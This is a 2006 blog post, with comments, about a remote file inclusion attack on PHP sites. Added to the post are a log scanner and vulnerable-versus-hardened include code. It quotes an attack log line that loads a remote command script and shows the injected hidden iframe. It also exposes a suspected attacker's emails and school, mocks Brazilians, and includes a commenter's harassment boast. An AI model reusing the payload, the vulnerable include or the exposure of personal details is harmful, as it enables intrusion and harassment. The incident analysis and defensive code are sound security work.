Idiots with nothing to do
We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?
I took a look at the server logs for every domain. I was looking for a POST request, since I figured it must have been some script kiddie trying to break into our pages with this dumb method. In little time I found something as suspicious as the following:
201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"
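A small log scanner, added here as an example that is not part of the original post, which hunts through Apache combined-format lines for the pattern above: a query-string parameter whose decoded value is itself a URL. The log lines and addresses are constructed samples, not the real ones.

```php
<?php
// Added example: flag access-log requests where a query parameter carries a
// remote URL (http/https/ftp), the signature of a remote file inclusion probe.

// Constructed sample lines; the first mimics the entry quoted in the post.
$sampleLog = <<<'LOG'
203.0.113.5 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fexample.invalid%2Fcmd01.txt%3F&&s=r&cmd=dir HTTP/1.1" 200 3819 "-" "Mozilla/5.0"
203.0.113.6 - - [27/May/2006:22:41:10 +0000] "GET /index.php?go=news HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [27/May/2006:22:42:03 +0000] "GET /index.php?go=ftp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 3819 "-" "-"
LOG;

function findRfiAttempts(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Pull the client IP and the request path out of the combined log format.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $ip = $m[1];
        $query = parse_url($m[2], PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        // parse_str percent-decodes, so "http%3A%2F%2F" becomes "http://".
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^(?:https?|ftp)://#i', $value)) {
                $hits[] = ['ip' => $ip, 'param' => $name, 'value' => $value];
            }
        }
    }
    return $hits;
}

foreach (findRfiAttempts($sampleLog) as $hit) {
    printf("%s tried to include %s via parameter '%s'\n", $hit['ip'], $hit['value'], $hit['param']);
}
```

Run it against a real log with `file_get_contents('/var/log/apache2/access.log')` in place of the sample; the first and third constructed lines are reported, the plain `go=news` request is not.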
If you open the included URL (http://www.tnwhunters.com/cmd01.txt) you see that the server returns a plain text file, which the script in neonv2 interpreted as PHP, hence running all the code he put in that file and making it available to him. (Obviously we fixed it immediately and you can't do it anymore.) Also, the server's own site is about animal hunting, which is completely off-topic. Weird…
That code (take a look, it won't open any pop-up… it's plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and exploit it by getting their control panel loaded. Curiously, it is half written in Brazilian Portuguese. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.
The question is why did this idiot add this piece of HTML to every page and script? Not to become famous, since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added code like this:
iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …
This code apparently belongs to an affiliate programme (based in China) in which he would get paid for each impression the servers at free20 received through his affiliate code. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:
- submitting security announcements (which curiously match the description of the vulnerabilities he exploits to earn money)
- signing up in gmail (soauker@gmail.com)
- writing in forums defending hackers against the system, also providing another e-mail address: jpfg@zipmail.com.br. This address could correspond to his real name's initials.
It is easy to confirm that both soaukers are the same person even if they don't use the same e-mail addresses, because he still uses "Adivinha seuburro" as a fake name, both in the security announcement and in this forum post. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. It all matches.
There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which are still related to Linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy who studied there in 2004 and was deeply interested in hacking and *nix systems.
So Brazilians hadn't had enough with spamming our nice orkut scrapbooks with crap messages; now they also try to earn money the quick way. Ridiculous…
It is a pity that I can't find any website or abuse e-mail address for his internet provider so that I could send them the logs he produced, but anyway I hope this is useful for someone.
Final advice: always, always, always filter input arguments to your scripts.
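What that advice looks like in code, as an added example that is not the original site's code: the section-loading pattern the post describes, beside a hardened version that never lets request input become part of a path. The section names and file paths are assumptions.

```php
<?php
// Added example (not from the original site). Section names and paths are
// hypothetical.

// VULNERABLE: the request decides which file is included. With remote URL
// fopen/include enabled, ?go=http://attacker/cmd01.txt? makes PHP fetch that
// text file and run it as PHP. The attacker's trailing "?" turns the ".php"
// we append into a query string the remote server simply ignores.
function loadSectionVulnerable(array $get): void
{
    $section = $get['go'] ?? 'home';
    include $section . '.php';   // a remote URL or ../ path goes straight in
}

// HARDENED: the request value is only a key into a fixed allowlist.
const SECTIONS = [
    'home'  => 'sections/home.php',
    'news'  => 'sections/news.php',
    'about' => 'sections/about.php',
];

function resolveSection(array $get): string
{
    $section = $get['go'] ?? 'home';
    if (!is_string($section) || !array_key_exists($section, SECTIONS)) {
        // Unknown or malformed section: fall back instead of trusting input.
        return SECTIONS['home'];
    }
    return SECTIONS[$section];
}

function loadSectionHardened(array $get): void
{
    include __DIR__ . '/' . resolveSection($get);
}

// Exercise the resolver only (no files are actually included here).
var_dump(resolveSection(['go' => 'news']));
var_dump(resolveSection(['go' => 'http://attacker.invalid/cmd01.txt?']));
var_dump(resolveSection(['go' => '../../etc/passwd']));
var_dump(resolveSection(['go' => ['nested' => 'array']]));
```

As defence in depth, also set `allow_url_include = Off` (and, on older PHP releases that lack it, `allow_url_fopen = Off`) in php.ini so that `include` can never fetch a remote URL even if an allowlist is forgotten.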
And for Soauker: GET A FUCKING LIFE!


shine
20060528
trace already told me the story, sorry for the carelessness! Since I had no experience at all with PHP I hadn't thought about the site's security, not just for the neon domain but the rest as well… Sorry! :(((
Julio Gorgé
20060528
Hehe, that was funny :DD
ps
20060528
hehehe brazilians :D
evil
20060528
hi sole
I've added him to a shitload of gay sites
just so you know !
and oh!!!… in summer you eat less :D
don't forget to come to Inercia 2006, bigger, better, more !
sole
20060528
hahaha!
I also sent a pair of e-mails to his ISP and the CERT.br. Although I seriously doubt they will do anything but hey… who knows!
eis
20060902
Eh..
That's a huge security hole in your sites. Instead of bashing, you should be thankful somebody exposed it. With website coding that bad, you really should find yourself another job, or at least get a clue and start learning before you actually code anything.
I do web programming for living and I'm sad to see this kind of incompetency all over the web.
sole
20060902
Obviously it's you who doesn't have a clue about anything. That code wasn't made by me. I can assure you I check for that kind of error systematically, and that's how I spotted the bug, which was in one sub-site we own.
Next time try to get some info before talking nonsense, incompetent commenter.
soledad penadés » Blog Archive » How to set up the web server for working in a team
20061215
[...] So apache can read stuff which users upload, but it can't modify or write to those folders because apache and the user are in different groups. And the traditional solution is to give permissions to everybody. Which, if you have attacks like this one, may allow the attacker to modify the whole hosted tree, which proves that using chmod 777 systematically is a Very Bad Idea. [...]